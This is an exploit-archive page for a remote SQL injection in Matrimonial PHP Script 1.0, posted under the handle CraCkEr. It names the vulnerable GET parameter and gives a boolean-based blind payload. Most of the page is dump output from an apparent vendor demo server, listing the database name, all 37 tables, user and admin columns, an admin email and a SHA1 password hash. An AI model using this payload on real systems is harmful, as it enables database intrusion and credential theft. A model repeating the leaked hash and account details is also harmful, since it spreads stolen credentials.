what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Matrimonial PHP Script 1.0 SQL Injection

Matrimonial PHP Script 1.0 SQL Injection
Posted Aug 9, 2022
Authored by CraCkEr

Matrimonial PHP Script version 1.0 suffers from a remote SQL injection vulnerability.

tags | exploit, remote, php, sql injection
SHA-256 | dea1ba958ed1aef8b263c768dc1166b983798ae9571329778e696710463b676d
Download | Favorite | View

Matrimonial PHP Script 1.0 SQL Injection

Change Mirror Download
┌┌───────────────────────────────────────────────────────────────────────────────────────┐
││                                     C r a C k E r                                    ┌┘
┌┘                 T H E   C R A C K   O F   E T E R N A L   M I G H T                  ││
└───────────────────────────────────────────────────────────────────────────────────────┘┘

 ┌────              From The Ashes and Dust Rises An Unimaginable crack....          ────┐
┌┌───────────────────────────────────────────────────────────────────────────────────────┐
┌┘                                       [ Exploits ]                                   ┌┘
└───────────────────────────────────────────────────────────────────────────────────────┘┘
:  Author   : CraCkEr                        │ │                                         :
│  Website  : uisort.com                     │ │                                         │
│  Vendor   : Uisort Technologies Pvt. Ltd.  │ │                                         │
│  Software : Matrimonial PHP Script v1.0    │ │  Matrimonial Script PHP tailored with   │
│  Demo     : stage.matrimic.in              │ │  advanced features website              │
│  Vuln Type: Remote SQL Injection           │ │  & mobile apps from matrimic            │
│  Method   : GET                            │ │                                         │
│  Impact   : Database Access                │ │                                         │
│                                            │ │                                         │
│────────────────────────────────────────────┘ └─────────────────────────────────────────│
│                              B4nks-NET irc.b4nks.tk #unix                             ┌┘
└───────────────────────────────────────────────────────────────────────────────────────┘┘
:                                                                                        :
│  Release Notes:                                                                        │
│  ═════════════                                                                         │
│  Typically used for remotely exploitable vulnerabilities that can lead to              │
│  system compromise.                                                                    │
│                                                                                        │
┌┌───────────────────────────────────────────────────────────────────────────────────────┐
┌┘                                                                                      ┌┘
└───────────────────────────────────────────────────────────────────────────────────────┘┘

Greets:
       Phr33k , NK, GoldenX, Wehla, Cap, ZARAGAGA, DarkCatSpace, R0ot, KnG, Centerk
     loool, DevS, Dark-Gost, Carlos132sp, ProGenius, bomb, fjear, H3LLB0Y
       
     CryptoJob (Twitter) twitter.com/CryptozJob
     
┌┌───────────────────────────────────────────────────────────────────────────────────────┐
┌┘                                     © CraCkEr 2022                                   ┌┘
└───────────────────────────────────────────────────────────────────────────────────────┘┘


GET parameter 'Userdetails[ud_gender]' is vulnerable

---
Parameter: Userdetails[ud_gender] (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: Userdetails[ud_gender]=1 AND 2636=2636
---

[+] Starting the Attack

[INFO] the back-end DBMS is MySQL
web application technology: Apache
back-end DBMS: MySQL >= 5.0.0


[INFO] fetching current database
[INFO] retrieved: stage_db_qa


[INFO] fetching number of tables for database 'stage_db_qa'
Database: stage_db_qa
[37 tables]
+--------------------+
| YiiCache           |
| YiiLog             |
| mc_admin           |
| mc_blocklist       |
| mc_caste           |
| mc_city            |
| mc_cms             |
| mc_contact         |
| mc_contact_history |
| mc_country         |
| mc_currency        |
| mc_deleteprofile   |
| mc_education       |
| mc_feedback        |
| mc_gallery         |
| mc_height          |
| mc_horoscope       |
| mc_import_jobs     |
| mc_interest        |
| mc_language        |
| mc_message         |
| mc_occupation      |
| mc_partner         |
| mc_plan            |
| mc_profile_viewed  |
| mc_religion        |
| mc_searchlist      |
| mc_settings        |
| mc_shortlist       |
| mc_sms_history     |
| mc_state           |
| mc_subcaste        |
| mc_success_story   |
| mc_toungue         |
| mc_transaction     |
| mc_user            |
| mc_userdetails     |
+--------------------+


[INFO] fetching columns for table 'mc_admin' in database 'stage_db_qa'

Database: stage_db_qa
Table: mc_admin
[4 columns]
+--------------+-------------+
| Column       | Type        |
+--------------+-------------+
| admin_email  | varchar(32) |
| admin_id     | int(11)     |
| admin_name   | varchar(32) |
| admin_status | int(11)     |
+--------------+-------------+


[INFO] fetching number of column(s) 'admin_email,admin_id,admin_name,admin_status' entries for table 'mc_admin' in database 'stage_db_qa'

Database: stage_db_qa
Table: mc_admin
[1 entry]
+----------+-----------------------+------------+--------------+
| admin_id | admin_email           | admin_name | admin_status |
+----------+-----------------------+------------+--------------+
| 1        | admin@mat\x81imic.com | Admin      | 1            |
+----------+-----------------------+------------+--------------+


[INFO] fetching columns for table 'mc_user' in database 'stage_db_qa'

Database: stage_db_qa
Table: mc_user
[20 columns]
+------------------------+--------------+
| Column                 | Type         |
+------------------------+--------------+
| api_token              | varchar(255) |
| code                   | varchar(128) |
| device                 | varchar(32)  |
| user_activecode        | varchar(32)  |
| user_activedate        | datetime     |
| user_activestatus      | int(11)      |
| user_android_device_id | varchar(255) |
| user_email             | varchar(32)  |
| user_id                | int(11)      |
| user_ios_device_id     | varchar(255) |
| user_ipaddress         | varchar(32(  |
| user_lastlogin         | datetime     |
| user_mobile            | bigint(20)   |
| user_opensource        | varchar(32)  |
| user_password          | varchar(255) |
| user_salt              | varchar(64)  |
| user_status            | int(11)      |
| user_type              | int(11)      |
| user_userid            | int(11)      |
| user_verified_token    | varchar(255) |
+------------------------+--------------+


[INFO] fetching number of column(s) 'user_email,user_id,user_password,user_type,user_userid' entries for table 'mc_user' in database 'stage_db_qa'

Database: stage_db_qa
Table: mc_user
[1 entry]
+---------+--------------------+------------------------------------------+-----------+-------------+
| user_id | user_email         | user_password                            | user_type | user_userid |
+---------+--------------------+------------------------------------------+-----------+-------------+
| 1       | admin@matrimic.com | fa4c71db18591d0323141b39ab337b59b584b3b9 | 1         | 1           |
+---------+--------------------+------------------------------------------+-----------+-------------+
                                Possible Algorithms: SHA1
                
                
[-] Done
Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    30 Files
  • 16
    Apr 16th
    10 Files
  • 17
    Apr 17th
    22 Files
  • 18
    Apr 18th
    0 Files
  • 19
    Apr 19th
    0 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    0 Files
  • 23
    Apr 23rd
    0 Files
  • 24
    Apr 24th
    0 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Site Links
News by Month
News Tags
Files by Month
File Tags
File Directory
About Us
History & Purpose
Contact Information
Terms of Service
Privacy Statement
Copyright Information
Services
Security Services
Hosting By
Rokasec
close